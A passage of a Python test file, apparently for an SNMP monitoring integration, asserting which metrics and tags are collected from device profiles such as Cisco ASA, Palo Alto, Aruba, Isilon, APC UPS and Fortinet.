"cpqDaPhyDrvHardReadErrs", "cpqDaPhyDrvRecvReadErrs", "cpqDaPhyDrvHardWriteErrs", "cpqDaPhyDrvRecvWriteErrs", "cpqDaPhyDrvHSeekErrs", "cpqDaPhyDrvSeekErrs", ] drive_gauges = [ "cpqDaPhyDrvStatus", "cpqDaPhyDrvFactReallocs", "cpqDaPhyDrvSpinupTime", "cpqDaPhyDrvSize", "cpqDaPhyDrvSmartStatus", "cpqDaPhyDrvCurrentTemperature", ] drive_idx = [(0, 2), (0, 28), (8, 31), (9, 24), (9, 28), (10, 17), (11, 4), (12, 20), (18, 22), (23, 2)] for drive_cntrl_idx, drive_index in drive_idx: tags = ['drive_cntrl_idx:{}'.format(drive_cntrl_idx), "drive_index:{}".format(drive_index)] + common_tags for metric in drive_counts: aggregator.assert_metric( 'snmp.{}'.format(metric), metric_type=aggregator.MONOTONIC_COUNT, tags=tags, count=1 ) for metric in drive_gauges: aggregator.assert_metric('snmp.{}'.format(metric), metric_type=aggregator.GAUGE, tags=tags, count=1) for interface in ['eth0', 'eth1']: if_tags = ['interface:{}'.format(interface)] + common_tags for metric in IF_COUNTS: aggregator.assert_metric( 'snmp.{}'.format(metric), metric_type=aggregator.MONOTONIC_COUNT, tags=if_tags, count=1 ) for metric in IF_GAUGES: aggregator.assert_metric('snmp.{}'.format(metric), metric_type=aggregator.GAUGE, tags=if_tags, count=1) for metric in IF_RATES: aggregator.assert_metric('snmp.{}'.format(metric), metric_type=aggregator.RATE, tags=if_tags, count=1) mem_boards = ['11', '12'] for board in mem_boards: tags = ['mem_board_index:{}'.format(board)] + common_tags aggregator.assert_metric('snmp.cpqHeResMem2ModuleCondition', metric_type=aggregator.GAUGE, tags=tags, count=1) adapter_gauges = ['cpqNicIfPhysAdapterStatus', 'cpqNicIfPhysAdapterState'] for gauge in adapter_gauges: tags = ['adapter_name:adapter', 'adapter_mac_addr:mac'] + common_tags aggregator.assert_metric('snmp.{}'.format(gauge), metric_type=aggregator.GAUGE, tags=tags, count=1) power_metrics = [ 'cpqHeFltTolPowerSupplyStatus', 'cpqHeFltTolPowerSupplyCapacityUsed', 'cpqHeFltTolPowerSupplyCapacityMaximum', ] for gauge in power_metrics: tags = ['chassis_num:30'] + common_tags aggregator.assert_metric('snmp.{}'.format(gauge), metric_type=aggregator.GAUGE, tags=tags, count=1) controller_index = ['controller_index:3'] + common_tags aggregator.assert_metric( 'snmp.{}'.format("cpqDaCntlrCondition"), metric_type=aggregator.GAUGE, tags=controller_index, count=1 ) thermal_metrics = ['cpqHeThermalCondition', 'cpqHeSysUtilLifeTime', 'cpqHeFltTolPwrSupplyStatus'] for metric in thermal_metrics: aggregator.assert_metric('snmp.{}'.format(metric), metric_type=aggregator.GAUGE, tags=common_tags, count=1) aggregator.assert_all_metrics_covered() @pytest.mark.usefixtures("dd_environment") def test_generic_host_resources(aggregator): instance = common.generate_instance_config([]) instance['community_string'] = 'generic_host' instance['enforce_mib_constraints'] = False instance['profile'] = 'generic' init_config = {'profiles': {'generic': {'definition_file': '_generic-host-resources.yaml'}}} check = SnmpCheck('snmp', init_config, [instance]) check.check(instance) common_tags = common.CHECK_TAGS + ['snmp_profile:generic'] common.assert_common_metrics(aggregator, common_tags) sys_metrics = [ 'snmp.hrSystemUptime', 'snmp.hrSystemNumUsers', 'snmp.hrSystemProcesses', 'snmp.hrSystemMaxProcesses', ] for metric in sys_metrics: aggregator.assert_metric(metric, metric_type=aggregator.GAUGE, tags=common_tags, count=1) aggregator.assert_metric('snmp.hrStorageAllocationUnits', count=2) aggregator.assert_metric('snmp.hrStorageSize', count=2) aggregator.assert_metric('snmp.hrStorageUsed', count=2) aggregator.assert_metric('snmp.hrStorageAllocationFailures', count=2) aggregator.assert_metric('snmp.hrProcessorLoad', count=2) aggregator.assert_all_metrics_covered() @pytest.mark.usefixtures("dd_environment") def test_palo_alto(aggregator): run_profile_check('pan-common') common_tags = common.CHECK_TAGS + ['snmp_profile:palo-alto'] common.assert_common_metrics(aggregator, common_tags) session = [ 'panSessionUtilization', 'panSessionMax', 'panSessionActive', 'panSessionActiveTcp', 'panSessionActiveUdp', 'panSessionActiveICMP', 'panSessionActiveSslProxy', 'panSessionSslProxyUtilization', ] global_protect = [ 'panGPGWUtilizationPct', 'panGPGWUtilizationMaxTunnels', 'panGPGWUtilizationActiveTunnels', ] entity = [ 'panEntityTotalPowerAvail', 'panEntityTotalPowerUsed', ] entry = ['panEntryFRUModulePowerUsed', 'panEntryFRUModuleNumPorts'] for metric in session: aggregator.assert_metric('snmp.{}'.format(metric), metric_type=aggregator.GAUGE, tags=common_tags, count=1) for metric in global_protect: aggregator.assert_metric('snmp.{}'.format(metric), metric_type=aggregator.GAUGE, tags=common_tags, count=1) for metric in entity: aggregator.assert_metric('snmp.{}'.format(metric), metric_type=aggregator.GAUGE, tags=common_tags, count=1) for metric in entry: # Needs cross table entPhysicalIsFRU tag aggregator.assert_metric('snmp.{}'.format(metric), metric_type=aggregator.GAUGE, tags=common_tags) # Needs cross table entLogicalDescr tag aggregator.assert_metric('snmp.panEntryFanTrayPowerUsed', metric_type=aggregator.GAUGE, tags=common_tags) aggregator.assert_all_metrics_covered() @pytest.mark.usefixtures("dd_environment") def test_cisco_asa_5525(aggregator): run_profile_check('cisco_asa_5525') common_tags = common.CHECK_TAGS + ['snmp_profile:cisco-asa-5525', 'snmp_host:kept'] common.assert_common_metrics(aggregator, common_tags) for metric in TCP_COUNTS: aggregator.assert_metric( 'snmp.{}'.format(metric), metric_type=aggregator.MONOTONIC_COUNT, tags=common_tags, count=1 ) for metric in TCP_GAUGES: aggregator.assert_metric('snmp.{}'.format(metric), metric_type=aggregator.GAUGE, tags=common_tags, count=1) for metric in UDP_COUNTS: aggregator.assert_metric( 'snmp.{}'.format(metric), metric_type=aggregator.MONOTONIC_COUNT, tags=common_tags, count=1 ) if_tags = ['interface:eth0'] + common_tags for metric in IF_COUNTS: aggregator.assert_metric( 'snmp.{}'.format(metric), metric_type=aggregator.MONOTONIC_COUNT, tags=if_tags, count=1 ) for metric in IF_GAUGES: aggregator.assert_metric('snmp.{}'.format(metric), metric_type=aggregator.GAUGE, tags=if_tags, count=1) for metric in IF_RATES: aggregator.assert_metric('snmp.{}'.format(metric), metric_type=aggregator.RATE, tags=if_tags, count=1) aggregator.assert_metric('snmp.cieIfResetCount', metric_type=aggregator.MONOTONIC_COUNT, tags=common_tags, count=1) frus = [3, 4, 5, 7, 16, 17, 24, 25] for fru in frus: tags = ['fru:{}'.format(fru)] + common_tags for metric in FRU_METRICS: aggregator.assert_metric('snmp.{}'.format(metric), metric_type=aggregator.GAUGE, tags=tags, count=1) cpus = [7746] for cpu in cpus: tags = ['cpu:{}'.format(cpu)] + common_tags for metric in CPU_METRICS: aggregator.assert_metric('snmp.{}'.format(metric), metric_type=aggregator.GAUGE, tags=tags, count=1) sensor_tags = ['sensor_id:31', 'sensor_type:9'] + common_tags aggregator.assert_metric('snmp.entPhySensorValue', metric_type=aggregator.GAUGE, tags=sensor_tags, count=1) stat_tags = [(20, 2), (5, 5)] for (svc, stat) in stat_tags: aggregator.assert_metric( 'snmp.cfwConnectionStatValue', metric_type=aggregator.GAUGE, tags=['stat_type:{}'.format(stat), 'service_type:{}'.format(svc)] + common_tags, ) aggregator.assert_metric('snmp.crasNumDeclinedSessions', metric_type=aggregator.GAUGE, tags=common_tags) aggregator.assert_metric('snmp.crasNumSessions', metric_type=aggregator.GAUGE, tags=common_tags) aggregator.assert_metric('snmp.crasNumUsers', metric_type=aggregator.GAUGE, tags=common_tags) aggregator.assert_metric( 'snmp.crasNumSetupFailInsufResources', metric_type=aggregator.MONOTONIC_COUNT, tags=common_tags ) aggregator.assert_metric('snmp.cipSecGlobalActiveTunnels', metric_type=aggregator.GAUGE, tags=common_tags) aggregator.assert_metric('snmp.cipSecGlobalHcInOctets', metric_type=aggregator.MONOTONIC_COUNT, tags=common_tags) aggregator.assert_metric('snmp.cipSecGlobalHcOutOctets', metric_type=aggregator.MONOTONIC_COUNT, tags=common_tags) for (index, state) in [(3, 3), (6, 6), (8, 6), (11, 6), (13, 3), (14, 6), (20, 6), (21, 4), (31, 5)]: aggregator.assert_metric( 'snmp.ciscoEnvMonTemperatureStatusValue', metric_type=aggregator.GAUGE, tags=['temp_state:{}'.format(state), 'temp_index:{}'.format(index)] + common_tags, ) aggregator.assert_metric( 'snmp.ciscoEnvMonSupplyState', metric_type=aggregator.GAUGE, tags=['power_source:1'] + common_tags, ) fan_indices = [4, 6, 7, 16, 21, 22, 25, 27] for index in fan_indices: tags = ['fan_status_index:{}'.format(index)] + common_tags aggregator.assert_metric( 'snmp.ciscoEnvMonFanState', metric_type=aggregator.GAUGE, tags=tags, ) aggregator.assert_metric('snmp.cswStackPortOperStatus', metric_type=aggregator.GAUGE) aggregator.assert_metric( 'snmp.cswSwitchState', metric_type=aggregator.GAUGE, tags=['mac_addr:0xffffffffffff'] + common_tags ) frus = [2, 7, 8, 21, 26, 27, 30, 31] for fru in frus: tags = ['fru:{}'.format(fru)] + common_tags aggregator.assert_metric( 'snmp.cefcFanTrayOperStatus', metric_type=aggregator.GAUGE, tags=['fru:{}'.format(fru)] + common_tags ) for metrics in MEMORY_METRICS: tags = ['mem_pool_name:test_pool'] + common_tags aggregator.assert_metric('snmp.{}'.format(metrics), metric_type=aggregator.GAUGE, tags=tags) for conn in [1, 2, 5]: conn_tags = ['connection_type:{}'.format(conn)] + common_tags aggregator.assert_metric('snmp.cfwConnectionStatCount', metric_type=aggregator.RATE, tags=conn_tags) hardware_tags = [(3, 'Secondary unit'), (5, 'Primary unit'), (6, 'Failover LAN Interface')] for (htype, hdesc) in hardware_tags: aggregator.assert_metric( 'snmp.cfwHardwareStatusValue', metric_type=aggregator.GAUGE, tags=['hardware_type:{}'.format(htype), 'hardware_desc:{}'.format(hdesc)] + common_tags, ) for switch in [4684, 4850, 8851, 9997, 15228, 16580, 24389, 30813, 36264]: aggregator.assert_metric( 'snmp.cvsChassisUpTime', metric_type=aggregator.GAUGE, tags=['chassis_switch_id:{}'.format(switch)] + common_tags, ) aggregator.assert_metric('snmp.sysUpTimeInstance', count=1) # RTT rtt_indexes = [1, 7, 10, 13, 15, 18, 20] rtt_types = [22, 21, 17, 6, 20, 8, 16] rtt_states = [3, 1, 6, 4, 6, 1, 6] rtt_gauges = ['rttMonLatestRttOperCompletionTime', 'rttMonLatestRttOperSense', 'rttMonCtrlOperTimeoutOccurred'] for i in range(len(rtt_indexes)): tags = [ "rtt_index:{}".format(rtt_indexes[i]), "rtt_type:{}".format(rtt_types[i]), "rtt_state:{}".format(rtt_states[i]), ] + common_tags for rtt in rtt_gauges: aggregator.assert_metric('snmp.{}'.format(rtt), metric_type=aggregator.GAUGE, tags=tags) aggregator.assert_all_metrics_covered() @pytest.mark.usefixtures("dd_environment") def test_cisco_csr(aggregator): run_profile_check('cisco-csr1000v') common_tags = common.CHECK_TAGS + ['snmp_profile:cisco-csr1000v'] common.assert_common_metrics(aggregator, common_tags) tags = ['neighbor:244.12.239.177'] + common_tags for metric in PEER_GAUGES: aggregator.assert_metric('snmp.{}'.format(metric), metric_type=aggregator.GAUGE, tags=tags) for metric in PEER_RATES: aggregator.assert_metric('snmp.{}'.format(metric), metric_type=aggregator.RATE, tags=tags) aggregator.assert_all_metrics_covered() aggregator.assert_metrics_using_metadata(get_metadata_metrics()) @pytest.mark.usefixtures("dd_environment") def test_checkpoint_firewall(aggregator): run_profile_check('checkpoint-firewall') common_tags = common.CHECK_TAGS + ['snmp_profile:checkpoint-firewall'] common.assert_common_metrics(aggregator, common_tags) cpu_metrics = [ 'multiProcUserTime', 'multiProcSystemTime', 'multiProcIdleTime', 'multiProcUsage', ] cpu_cores = [7097, 13039, 13761, 28994, 29751, 33826, 40053, 48847, 61593, 65044] for core in cpu_cores: tags = ['cpu_core:{}'.format(core)] + common_tags for metric in cpu_metrics: aggregator.assert_metric('snmp.{}'.format(metric), metric_type=aggregator.GAUGE, tags=tags) aggregator.assert_metric('snmp.procNum', metric_type=aggregator.GAUGE, tags=common_tags) mem_metrics = ['memTotalReal64', 'memActiveReal64', 'memFreeReal64', 'memTotalVirtual64', 'memActiveVirtual64'] for metric in mem_metrics: aggregator.assert_metric('snmp.{}'.format(metric), metric_type=aggregator.GAUGE, tags=common_tags) disk_metrics = [ 'multiDiskSize', 'multiDiskUsed', 'multiDiskFreeTotalBytes', 'multiDiskFreeAvailableBytes', 'multiDiskFreeTotalPercent', 'multiDiskFreeAvailablePercent', ] appliance_metrics = [ 'fanSpeedSensorValue', 'fanSpeedSensorStatus', 'tempertureSensorValue', 'tempertureSensorStatus', ] common_indices = range(10) common_names = ['first', 'second', 'third', 'fourth', 'fifth', 'sixth', 'seventh', 'eighth', 'ninth', 'tenth'] for idx in common_indices: name = common_names[idx] tags = ['disk_index:{}'.format(idx), 'disk_name:{}'.format(name)] + common_tags for metric in disk_metrics: aggregator.assert_metric('snmp.{}'.format(metric), metric_type=aggregator.GAUGE, tags=tags) tags = ['sensor_index:{}'.format(idx), 'sensor_name:{}'.format(name)] + common_tags for metric in appliance_metrics: aggregator.assert_metric('snmp.{}'.format(metric), metric_type=aggregator.GAUGE, tags=tags) fw_count_metrics = ['fwAccepted', 'fwDropped', 'fwRejected'] for metric in fw_count_metrics: aggregator.assert_metric('snmp.{}'.format(metric), metric_type=aggregator.MONOTONIC_COUNT, tags=common_tags) fw_gauge_metrics = ['fwNumConn', 'fwPeakNumConn'] for metric in fw_gauge_metrics: aggregator.assert_metric('snmp.{}'.format(metric), metric_type=aggregator.GAUGE, tags=common_tags) aggregator.assert_all_metrics_covered() @pytest.mark.usefixtures("dd_environment") def test_arista(aggregator): run_profile_check('arista') common_tags = common.CHECK_TAGS + ['snmp_profile:arista'] common.assert_common_metrics(aggregator, common_tags) aggregator.assert_metric( 'snmp.aristaEgressQueuePktsDropped', metric_type=aggregator.MONOTONIC_COUNT, tags=common_tags + ['interface_index:13', 'queue_index:10'], count=1, ) aggregator.assert_metric( 'snmp.aristaEgressQueuePktsDropped', metric_type=aggregator.MONOTONIC_COUNT, tags=common_tags + ['interface_index:28', 'queue_index:22'], count=1, ) aggregator.assert_metric( 'snmp.aristaIngressQueuePktsDropped', metric_type=aggregator.MONOTONIC_COUNT, tags=common_tags + ['interface_index:7', 'queue_index:25'], count=1, ) aggregator.assert_metric( 'snmp.aristaIngressQueuePktsDropped', metric_type=aggregator.MONOTONIC_COUNT, tags=common_tags + ['interface_index:8', 'queue_index:24'], count=1, ) for (sensor_id, sensor_type) in [(1, 11), (7, 8)]: sensor_tags = ['sensor_id:{}'.format(sensor_id), 'sensor_type:{}'.format(sensor_type)] + common_tags aggregator.assert_metric('snmp.entPhySensorValue', metric_type=aggregator.GAUGE, tags=sensor_tags, count=1) aggregator.assert_metric('snmp.entPhySensorOperStatus', metric_type=aggregator.GAUGE, tags=sensor_tags, count=1) aggregator.assert_all_metrics_covered() @pytest.mark.usefixtures("dd_environment") def test_aruba(aggregator): run_profile_check('aruba') common_tags = common.CHECK_TAGS + ['snmp_profile:aruba'] common.assert_common_metrics(aggregator, common_tags) for fan in [18, 28]: fan_tags = common_tags + ['fan_index:{}'.format(fan)] aggregator.assert_metric('snmp.sysExtFanStatus', metric_type=aggregator.GAUGE, tags=fan_tags, count=1) for psu in [1, 17]: psu_tags = common_tags + ['powersupply_index:{}'.format(psu)] aggregator.assert_metric('snmp.sysExtPowerSupplyStatus', metric_type=aggregator.GAUGE, tags=psu_tags, count=1) for proc in [11, 26]: proc_tags = common_tags + ['processor_index:{}'.format(proc)] aggregator.assert_metric('snmp.sysExtProcessorLoad', metric_type=aggregator.GAUGE, tags=proc_tags, count=1) for mem in [3, 20]: mem_tags = common_tags + ['memory_index:{}'.format(mem)] aggregator.assert_metric('snmp.sysExtMemorySize', metric_type=aggregator.GAUGE, tags=mem_tags, count=1) aggregator.assert_metric('snmp.sysExtMemoryUsed', metric_type=aggregator.GAUGE, tags=mem_tags, count=1) aggregator.assert_metric('snmp.sysExtMemoryFree', metric_type=aggregator.GAUGE, tags=mem_tags, count=1) aggregator.assert_metric( 'snmp.wlsxSysExtPacketLossPercent', metric_type=aggregator.GAUGE, tags=common_tags, count=1 ) # OSPF metrics neighbor_metrics = [ ('ospfNbrEvents', aggregator.RATE), ('ospfNbrState', aggregator.GAUGE), ('ospfNbrLsRetransQLen', aggregator.GAUGE), ] for metric, metric_type in neighbor_metrics: tags = ['neighbor_ip:192.29.116.26', 'neighbor_id:192.29.66.79'] + common_tags aggregator.assert_metric('snmp.{}'.format(metric), metric_type=metric_type, tags=tags, count=1) virtual_neighbor_metrics = [ ('ospfVirtNbrState', aggregator.GAUGE), ('ospfVirtNbrEvents', aggregator.RATE), ('ospfVirtNbrLsRetransQLen', aggregator.GAUGE), ] for metric, metric_type in virtual_neighbor_metrics: for ip, nbr in [('74.210.82.1', '194.154.66.112'), ('122.226.86.1', '184.201.101.140')]: tags = ['neighbor_ip:{}'.format(ip), 'neighbor_id:{}'.format(nbr)] + common_tags aggregator.assert_metric('snmp.{}'.format(metric), metric_type=metric_type, tags=tags, count=1) lls_metrics = ['ospfIfRetransInterval', 'ospfIfState', 'ospfIfLsaCount'] for metric in lls_metrics: for ip, nbr in [('58.115.169.188', '192.29.66.79'), ('18.2.8.29', '118.246.193.247')]: tags = ['ospf_ip_addr:{}'.format(ip), 'neighbor_id:{}'.format(nbr)] + common_tags aggregator.assert_metric('snmp.{}'.format(metric), metric_type=aggregator.GAUGE, tags=tags, count=1) virtual_lls_metrics = ['ospfVirtIfRetransInterval', 'ospfVirtIfState', 'ospfVirtIfLsaCount'] for metric in virtual_lls_metrics: for nbr in ['194.154.66.112', '184.201.101.140']: tags = ['neighbor_id:{}'.format(nbr)] + common_tags aggregator.assert_metric('snmp.{}'.format(metric), metric_type=aggregator.GAUGE, tags=tags, count=1) aggregator.assert_all_metrics_covered() @pytest.mark.usefixtures("dd_environment") def test_chatsworth(aggregator): run_profile_check('chatsworth') # Legacy global tags are applied to all metrics legacy_global_tags = [ 'legacy_pdu_macaddress:00:0E:D3:AA:CC:EE', 'legacy_pdu_model:P10-1234-ABC', 'legacy_pdu_name:legacy-name1', 'legacy_pdu_version:1.2.3', ] common_tags = common.CHECK_TAGS + legacy_global_tags + ['snmp_profile:chatsworth_pdu'] common.assert_common_metrics(aggregator, common_tags) # Legacy metrics legacy_pdu_tags = common_tags legacy_pdu_gauge_metrics = [ 'snmp.pduRole', 'snmp.outOfService', ] legacy_pdu_monotonic_count_metrics = [] for line in range(1, 4): legacy_pdu_gauge_metrics.append('snmp.line{}curr'.format(line)) for branch in range(1, 3): legacy_pdu_gauge_metrics.append('snmp.temperatureProbe{}'.format(branch)) legacy_pdu_gauge_metrics.append('snmp.humidityProbe{}'.format(branch)) for xyz in ['xy', 'yz', 'zx']: legacy_pdu_monotonic_count_metrics.append('snmp.energy{}{}s'.format(xyz, branch)) legacy_pdu_gauge_metrics.append('snmp.voltage{}{}'.format(xyz, branch)) legacy_pdu_gauge_metrics.append('snmp.power{}{}'.format(xyz, branch)) legacy_pdu_gauge_metrics.append('snmp.powerFact{}{}'.format(xyz, branch)) legacy_pdu_gauge_metrics.append('snmp.current{}{}'.format(xyz, branch)) for branch in range(1, 25): legacy_pdu_monotonic_count_metrics.append('snmp.receptacleEnergyoutlet{}s'.format(branch)) legacy_pdu_gauge_metrics.append('snmp.outlet{}Current'.format(branch)) for metric in legacy_pdu_gauge_metrics: aggregator.assert_metric(metric, metric_type=aggregator.GAUGE, tags=legacy_pdu_tags, count=1) for metric in legacy_pdu_monotonic_count_metrics: aggregator.assert_metric(metric, metric_type=aggregator.MONOTONIC_COUNT, tags=legacy_pdu_tags, count=1) # New metrics pdu_tags = common_tags + [ 'pdu_cabinetid:cab1', 'pdu_ipaddress:42.2.210.224', 'pdu_macaddress:0x00249b3503f6', 'pdu_model:model1', 'pdu_name:name1', 'pdu_version:v1.1', ] aggregator.assert_metric('snmp.cpiPduNumberBranches', metric_type=aggregator.GAUGE, tags=pdu_tags, count=1) aggregator.assert_metric('snmp.cpiPduNumberOutlets', metric_type=aggregator.GAUGE, tags=pdu_tags, count=1) aggregator.assert_metric('snmp.cpiPduOutOfService', metric_type=aggregator.GAUGE, tags=pdu_tags, count=1) aggregator.assert_metric('snmp.cpiPduUpgrade', metric_type=aggregator.GAUGE, tags=pdu_tags, count=1) aggregator.assert_metric('snmp.cpiPduChainRole', metric_type=aggregator.GAUGE, tags=pdu_tags, count=1) aggregator.assert_metric('snmp.cpiPduTotalPower', metric_type=aggregator.GAUGE, tags=pdu_tags, count=1) for lock in [1, 2]: lock_tags = common_tags + ['lock_id:{}'.format(lock)] aggregator.assert_metric('snmp.cpiPduEasStatus', metric_type=aggregator.GAUGE, tags=lock_tags, count=1) aggregator.assert_metric('snmp.cpiPduDoorStatus', metric_type=aggregator.GAUGE, tags=lock_tags, count=1) aggregator.assert_metric('snmp.cpiPduLockStatus', metric_type=aggregator.GAUGE, tags=lock_tags, count=1) for (sensor_name, sensor_index) in [('sensor1', 4), ('sensor2', 6)]: sensor_tags = common_tags + [ 'sensor_index:{}'.format(sensor_index), 'sensor_name:{}'.format(sensor_name), 'sensor_type:1', ] aggregator.assert_metric('snmp.cpiPduSensorValue', metric_type=aggregator.GAUGE, tags=sensor_tags, count=1) for line in [6, 18]: line_tags = common_tags + ['line_id:{}'.format(line)] aggregator.assert_metric('snmp.cpiPduLineCurrent', metric_type=aggregator.GAUGE, tags=line_tags, count=1) for branch in [1, 17]: branch_tags = common_tags + ['branch_id:{}'.format(branch)] aggregator.assert_metric('snmp.cpiPduBranchCurrent', metric_type=aggregator.GAUGE, tags=branch_tags, count=1) aggregator.assert_metric('snmp.cpiPduBranchMaxCurrent', metric_type=aggregator.GAUGE, tags=branch_tags, count=1) aggregator.assert_metric('snmp.cpiPduBranchVoltage', metric_type=aggregator.GAUGE, tags=branch_tags, count=1) aggregator.assert_metric('snmp.cpiPduBranchPower', metric_type=aggregator.GAUGE, tags=branch_tags, count=1) aggregator.assert_metric( 'snmp.cpiPduBranchPowerFactor', metric_type=aggregator.GAUGE, tags=branch_tags, count=1 ) aggregator.assert_metric('snmp.cpiPduBranchStatus', metric_type=aggregator.GAUGE, tags=branch_tags, count=1) aggregator.assert_metric( 'snmp.cpiPduBranchEnergy', metric_type=aggregator.MONOTONIC_COUNT, tags=branch_tags, count=1 ) for (outlet_id, outlet_branch, outlet_name) in [(7, 29, 'outlet1'), (16, 23, 'outlet2')]: outlet_tags = common_tags + [ 'outlet_id:{}'.format(outlet_id), 'outlet_branchid:{}'.format(outlet_branch), 'outlet_name:{}'.format(outlet_name), ] aggregator.assert_metric('snmp.cpiPduOutletCurrent', metric_type=aggregator.GAUGE, tags=outlet_tags, count=1) aggregator.assert_metric('snmp.cpiPduOutletVoltage', metric_type=aggregator.GAUGE, tags=outlet_tags, count=1) aggregator.assert_metric('snmp.cpiPduOutletPower', metric_type=aggregator.GAUGE, tags=outlet_tags, count=1) aggregator.assert_metric('snmp.cpiPduOutletStatus', metric_type=aggregator.GAUGE, tags=outlet_tags, count=1) aggregator.assert_metric( 'snmp.cpiPduOutletEnergy', metric_type=aggregator.MONOTONIC_COUNT, tags=outlet_tags, count=1 ) aggregator.assert_all_metrics_covered() aggregator.assert_metrics_using_metadata(get_metadata_metrics(), check_metric_type=False) @pytest.mark.usefixtures("dd_environment") def test_isilon(aggregator): run_profile_check('isilon') common_tags = common.CHECK_TAGS + [ 'snmp_profile:isilon', 'cluster_name:testcluster1', 'node_name:node1', 'node_type:1', ] cluster_rates = [ 'clusterIfsInBytes', 'clusterIfsOutBytes', ] node_rates = [ 'nodeIfsOutBytes', 'nodeIfsInBytes', ] protocol_metrics = [ 'protocolOpsPerSecond', 'latencyMin', 'latencyMax', 'latencyAverage', ] quota_metrics = ['quotaHardThreshold', 'quotaSoftThreshold', 'quotaUsage', 'quotaAdvisoryThreshold'] quota_ids_types = [ (422978632, 1), (153533730, 5), (3299369987, 4), (2149993012, 3), (1424325378, 1), (4245321451, 0), (2328145711, 1), (1198032230, 4), (1232918362, 1), (1383990869, 1), ] common.assert_common_metrics(aggregator, common_tags) for metric in quota_metrics: for qid, qtype in quota_ids_types: tags = ['quota_id:{}'.format(qid), 'quota_type:{}'.format(qtype)] + common_tags aggregator.assert_metric('snmp.{}'.format(metric), metric_type=aggregator.RATE, tags=tags, count=1) for metric in protocol_metrics: for num in range(1, 3): tags = ['protocol_name:testprotocol{}'.format(num)] + common_tags aggregator.assert_metric('snmp.{}'.format(metric), metric_type=aggregator.GAUGE, tags=tags, count=1) aggregator.assert_metric('snmp.clusterHealth', metric_type=aggregator.GAUGE, tags=common_tags, count=1) for metric in cluster_rates: aggregator.assert_metric('snmp.{}'.format(metric), metric_type=aggregator.RATE, tags=common_tags, count=1) aggregator.assert_metric('snmp.nodeHealth', metric_type=aggregator.GAUGE, tags=common_tags, count=1) for metric in node_rates: aggregator.assert_metric('snmp.{}'.format(metric), metric_type=aggregator.RATE, tags=common_tags, count=1) for fan in [4, 6, 10, 11, 14, 21, 22, 23, 25, 30]: tags = ['fan_name:testfan', 'fan_number:{}'.format(fan)] + common_tags aggregator.assert_metric('snmp.fanSpeed', metric_type=aggregator.GAUGE, tags=tags, count=1) for status, bay in [('SMARTFAIL', 1), ('HEALTHY', 2), ('DEAD', 3)]: tags = common_tags + ['disk_status:{}'.format(status), 'disk_bay:{}'.format((bay))] aggregator.assert_metric('snmp.diskSizeBytes', metric_type=aggregator.RATE, tags=tags) aggregator.assert_metric('snmp.ifsUsedBytes', metric_type=aggregator.RATE, tags=common_tags, count=1) aggregator.assert_metric('snmp.ifsTotalBytes', metric_type=aggregator.RATE, tags=common_tags, count=1) @pytest.mark.usefixtures("dd_environment") def test_apc_ups(aggregator): run_profile_check('apc_ups') profile_tags = [ 'snmp_profile:apc_ups', 'model:APC Smart-UPS 600', 'firmware_version:2.0.3-test', 'serial_num:test_serial', 'ups_name:testIdentName', ] tags = common.CHECK_TAGS + profile_tags metrics = [ 'upsAdvBatteryNumOfBadBattPacks', 'upsAdvBatteryReplaceIndicator', 'upsAdvBatteryRunTimeRemaining', 'upsAdvBatteryTemperature', 'upsAdvBatteryCapacity', 'upsHighPrecInputFrequency', 'upsHighPrecInputLineVoltage', 'upsHighPrecOutputCurrent', 'upsAdvInputLineFailCause', 'upsAdvOutputLoad', 'upsBasicBatteryTimeOnBattery', 'upsAdvTestDiagnosticsResults', ] common.assert_common_metrics(aggregator, tags) for metric in metrics: aggregator.assert_metric('snmp.{}'.format(metric), metric_type=aggregator.GAUGE, tags=tags, count=1) aggregator.assert_metric( 'snmp.upsOutletGroupStatusGroupState', metric_type=aggregator.GAUGE, tags=['outlet_group_name:test_outlet'] + tags, ) aggregator.assert_metric( 'snmp.upsBasicStateOutputState.AVRTrimActive', 1, metric_type=aggregator.GAUGE, tags=tags, count=1 ) aggregator.assert_metric( 'snmp.upsBasicStateOutputState.BatteriesDischarged', 1, metric_type=aggregator.GAUGE, tags=tags, count=1 ) aggregator.assert_metric( 'snmp.upsBasicStateOutputState.LowBatteryOnBattery', 1, metric_type=aggregator.GAUGE, tags=tags, count=1 ) aggregator.assert_metric( 'snmp.upsBasicStateOutputState.NoBatteriesAttached', 1, metric_type=aggregator.GAUGE, tags=tags, count=1 ) aggregator.assert_metric( 'snmp.upsBasicStateOutputState.OnLine', 0, metric_type=aggregator.GAUGE, tags=tags, count=1 ) aggregator.assert_metric( 'snmp.upsBasicStateOutputState.ReplaceBattery', 1, metric_type=aggregator.GAUGE, tags=tags, count=1 ) aggregator.assert_all_metrics_covered() @pytest.mark.usefixtures("dd_environment") def test_fortinet_fortigate(aggregator): run_profile_check('fortinet-fortigate') common_tags = common.CHECK_TAGS + ['snmp_profile:fortinet-fortigate'] common_gauge_metrics = [ 'fgSysCpuUsage', 'fgSysMemUsage', 'fgSysMemCapacity', 'fgSysLowMemUsage', 'fgSysLowMemCapacity', 'fgSysDiskUsage', 'fgSysDiskCapacity', 'fgSysSesCount', 'fgSysSesRate1', 'fgSysSes6Count', 'fgSysSes6Rate1', 'fgApHTTPConnections', 'fgApHTTPMaxConnections', 'fgVdNumber', 'fgVdMaxVdoms', ] processor_gauge_metrics = [ 'fgProcessorUsage', 'fgProcessorSysUsage', ] processor_count_metrics = [ 'fgProcessorPktRxCount', 'fgProcessorPktTxCount', 'fgProcessorPktDroppedCount', ] processor_tags = common_tags + ['processor_index:12'] vd_metrics = [ 'fgVdEntOpMode', 'fgVdEntHaState', 'fgVdEntCpuUsage', 'fgVdEntMemUsage', 'fgVdEntSesCount', 'fgVdEntSesRate', ] vd_tags = common_tags + ['virtualdomain_index:4', 'virtualdomain_name:their oxen quaintly'] common.assert_common_metrics(aggregator, common_tags) for metric in common_gauge_metrics: aggregator.assert_metric('snmp.{}'.format(metric), metric_type=aggregator.GAUGE, tags=common_tags, count=1) for metric in processor_gauge_metrics: aggregator.assert_metric('snmp.{}'.format(metric), metric_type=aggregator.GAUGE, tags=processor_tags, count=1) for metric in processor_count_metrics: aggregator.assert_metric( 'snmp.{}'.format(metric), metric_type=aggregator.MONOTONIC_COUNT, tags=processor_tags, count=1 ) aggregator.assert_metric( 'snmp.{}.rate'.format(metric), metric_type=aggregator.RATE, tags=processor_tags, count=1 ) for metric in vd_metrics: aggregator.assert_metric('snmp.{}'.format(metric), metric_type=aggregator.GAUGE, tags=vd_tags, count=1) # Interface aggregator.assert_metric('snmp.fgIntfEntVdom', metric_type=aggregator.GAUGE, count=1) # Firewall firewall_tags = common_tags + ['policy_index:22'] for metric in ['fgFwPolPktCount', 